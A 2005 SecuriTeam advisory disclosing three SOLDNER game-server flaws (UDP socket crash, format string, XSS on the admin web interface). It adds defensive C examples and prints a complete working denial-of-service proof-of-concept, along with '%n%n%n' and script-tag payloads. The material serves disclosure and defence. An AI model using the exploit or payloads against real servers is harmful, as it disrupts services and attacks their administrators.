[NT] SOLDNER Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 01/05/05
To: list@securiteam.com
Date: 5 Jan 2005 16:26:49 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SOLDNER Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
SOLDNER is "a tactical military game developed by Wings Simulations"
(http://www.wingssimulations.com).
Three security vulnerabilities have been discovered in SOLDNER: one allows
crashing the server, another allows crashing it and possibly executing
arbitrary code with the privileges of the user running the game server,
and the last allows attacking the admin of the game via a cross-site
scripting vulnerability.
DETAILS
Silent Socket Termination:
The bug occurs when the server receives a UDP packet of 1401 or more
bytes. Such a packet causes the immediate termination of the listening
thread because of bad handling of the "message too long" socket error. The
termination of the socket is silent (no warning or message), so the admin
cannot easily determine what has happened.
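The failure described above is a receive loop that treats a recoverable socket error as fatal. The following is an added example (not code from the advisory or from the game's server) of a UDP receive loop that classifies errors before deciding whether to stop: an oversized datagram is logged and dropped, and only a genuinely dead socket ends the loop. MAX_DGRAM is an assumed limit; the advisory only states that 1401 bytes or more triggers the bug. The MSG_TRUNC behaviour (real datagram length returned even when the buffer was too small) is Linux-specific; on Winsock the same condition surfaces as the EMSGSIZE/WSAEMSGSIZE error the classifier also handles.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Largest datagram the protocol is expected to carry (assumed value). */
#define MAX_DGRAM 1400

enum recv_verdict { RECV_OK, RECV_TRUNCATED, RECV_RETRY, RECV_FATAL };

/* Classify one recvfrom() result. n is the return value, err the errno
   captured right after the call, bufsz the size of the receive buffer. */
enum recv_verdict classify_recv(ssize_t n, int err, size_t bufsz)
{
    if (n < 0) {
        switch (err) {
        case EMSGSIZE:     /* "message too long": Winsock reports an oversized
                              datagram this way; it is not a dead socket */
        case EINTR:        /* interrupted by a signal */
        case EAGAIN:       /* non-blocking socket with nothing queued */
        case ECONNREFUSED: /* ICMP unreachable reflected onto the UDP socket */
            return RECV_RETRY;
        default:
            return RECV_FATAL; /* EBADF, ENOTSOCK, ENOMEM...: give up */
        }
    }
    /* With MSG_TRUNC, Linux returns the real datagram length even when it
       exceeded the buffer, so a length above bufsz means truncation. */
    if ((size_t)n > bufsz)
        return RECV_TRUNCATED;
    return RECV_OK;
}

/* Receive loop that survives oversized datagrams. Returns the number of
   well-formed datagrams handled, or -1 only on a fatal socket error. */
int serve_datagrams(int sd, int max_packets)
{
    unsigned char buf[MAX_DGRAM];
    int handled = 0, dropped = 0;

    while (handled < max_packets) {
        ssize_t n = recvfrom(sd, buf, sizeof buf, MSG_TRUNC, NULL, NULL);
        int err = errno;

        switch (classify_recv(n, err, sizeof buf)) {
        case RECV_FATAL:
            perror("recvfrom");
            return -1;
        case RECV_RETRY:
            continue;
        case RECV_TRUNCATED:
            /* Log loudly, so the admin sees what the original server hid. */
            fprintf(stderr, "warning: dropped %zd-byte datagram (limit %zu), "
                    "%d dropped so far\n", n, sizeof buf, ++dropped);
            continue;
        case RECV_OK:
            handled++; /* a real server would dispatch buf[0..n) here */
            break;
        }
    }
    return handled;
}
```

The point of splitting classification out of the loop is that the policy (which errors are transient, which are fatal) can be unit-tested without a socket; the loop itself only ever exits on RECV_FATAL.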
In-game Format String:
An attacker can crash or execute arbitrary code on the game server by
simply sending a message containing the format arguments (example:
%n%n%n).
In-game Cross Site Scripting (against the admin):
The SOLDNER server has a nice web interface (listening on TCP port 7890)
useful for the remote administration of the server. This web interface
also contains a screen (chat) in which the server logs are shown, including
the messages exchanged by the users. These user messages are not filtered,
allowing an attacker to make an unsuspecting admin's browser execute
arbitrary HTML or JavaScript code.
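Both in-game message bugs come from treating player text as something other than data: once as a printf format string, once as HTML on the admin's chat screen. The following is an added example (not the game's code or the advisory's) of the server-side handling a defender would want for a chat message: a fixed format string for the log line, a counter of conversion directives so probe attempts can be flagged, and an HTML escaper for the web interface. Function names and the "[chat]" line layout are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Count conversion directives in a chat message: any '%' not followed by
   another '%'. A non-zero count is worth logging as a probe attempt. */
int count_format_directives(const char *msg)
{
    int count = 0;
    for (const char *p = msg; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; } /* "%%" is a literal percent */
        count++;
    }
    return count;
}

/* Vulnerable pattern the advisory describes: the player's text *is* the
 * format string, so "%n" and friends are interpreted:
 *
 *     void log_chat_vulnerable(const char *msg) { printf(msg); }
 *
 * Hardened form: a fixed format; the message is only ever an argument.
 * Returns the line length, or -1 if it would not fit. */
int format_chat_line(char *out, size_t outsz, const char *player, const char *msg)
{
    int n = snprintf(out, outsz, "[chat] %s: %s", player, msg);
    if (n < 0 || (size_t)n >= outsz) return -1; /* truncated: refuse, don't guess */
    return n;
}

/* HTML-escape a string before it is written into the web admin's chat
   screen. Returns bytes written (excluding NUL) or -1 if out is too small. */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char tmp[2] = { (char)*p, 0 };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = tmp;      break;
        }
        size_t rl = strlen(rep);
        if (o + rl >= outsz) return -1;
        memcpy(out + o, rep, rl);
        o += rl;
    }
    if (o >= outsz) return -1;
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    /* Constructed sample message of the kind the advisory describes. */
    const char *player = "bob";
    const char *msg = "<script>alert(1)</script> %n%n%n";
    char line[128], html[256];

    if (count_format_directives(msg))
        fprintf(stderr, "alert: %d format directives in chat from %s\n",
                count_format_directives(msg), player);
    if (format_chat_line(line, sizeof line, player, msg) > 0)
        puts(line);                        /* literal text, nothing interpreted */
    if (html_escape(line, html, sizeof html) > 0)
        puts(html);                        /* safe to embed in the chat screen */
    return 0;
}
```

Escaping is done at the point of output into HTML, not on the way into the log, so the log keeps the raw message for forensics while the admin's browser only ever sees inert text.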
Exploit:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/soldnersock.zip
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"     /* provided by the author; not included in this advisory */
    #define close closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/time.h>   /* struct timeval */
    #include <sys/select.h> /* select(), fd_set */
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif

#define VER     "0.1"
#define BUFFSZ  2048
#define PORT    20000
#define TIMEOUT 3
#define BOOMSZ  1401

#define SEND(x,y)   if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \
                    < 0) std_err();
#define RECV        if(timeout(sd) < 0) { \
                        fputs("\nError: socket timeout, no reply received\n\n", stdout); \
                        exit(1); \
                    } \
                    len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
                    if(len < 0) std_err();

u_short crc16(u_char *data, int len);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    struct sockaddr_in  peer;
    int     sd,
            len;
    u_short port = PORT;
    u_char  buff[BUFFSZ],
            info[] =
                "\x00\x00"
                "\x02\x00\x00\x00\x00"
                "\x0A"          // size
                "\x05\x00"
                "\x0A"          // size, same as before
                "WING"
                "\x00\x00"      // build version (leave it empty)
                "\x00";

    setbuf(stdout, NULL);

    fputs("\n"
        "SOLDNER Secret Wars <= 30830 socket termination "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    fputs("- check server:\n", stdout);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    // first two bytes of the query are a checksum over the rest of the packet
    *(u_short *)info = crc16(info + 2, sizeof(info) - 3);
    SEND(info, sizeof(info) - 1);
    RECV;
    if(memcmp(buff + 11, "WING", 4)) {
        fputs("\nAlert: the server doesn't seem a valid Soldner server\n",
            stdout);
    }
    printf("  Build version %d\n", ntohs(*(u_short *)(buff + 18)));

    printf("\n- send BOOM packet (%d bytes)\n", BOOMSZ);
    memset(buff, 0x00, BOOMSZ);
    SEND(buff, BOOMSZ);

    fputs("- check server again:\n", stdout);
    SEND(info, sizeof(info) - 1);
    if(timeout(sd) < 0) {
        fputs("\nServer IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\nServer doesn't seem vulnerable\n\n", stdout);
    }

    close(sd);
    return(0);
}

// 16-bit XOR checksum over the packet body, computed a word at a time
u_short crc16(u_char *data, int len) {
    u_short *p = (u_short *)data,
            crc = 0;
    int     size = len >> 1;

    while(size--) crc ^= *p++;
    // this ntohs(htons) is needed for big/little endian compatibility
    if(len & 1) crc ^= ntohs(htons(*p) & 0xff00);
    return(crc);
}

// returns -1 if nothing arrives on sock within TIMEOUT seconds, 0 otherwise
int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}

u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}

#ifndef WIN32
void std_err(void) {
    perror("\nError");
    exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by Luigi Auriemma (aluigi@autistici.org).
The original article can be found at:
http://aluigi.altervista.org/adv/soldnerx-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.